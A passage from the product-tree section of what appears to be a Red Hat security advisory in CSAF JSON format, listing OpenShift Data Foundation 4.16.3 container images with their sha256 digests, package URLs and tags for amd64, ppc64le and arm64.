"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product_id": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product_id": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388?arch=amd64\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20?arch=amd64\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product_id": "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product_id": "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product_id": "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product_id": "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product_id": "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product_id": "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product_id": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product_id": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product_id": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product": {
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product_id": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product_id": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product_id": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product": {
"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product_id": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product_id": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product_id": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product_id": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.16.3-1"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product_id": "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product_id": "odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product_id": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"product_identification_helper": {
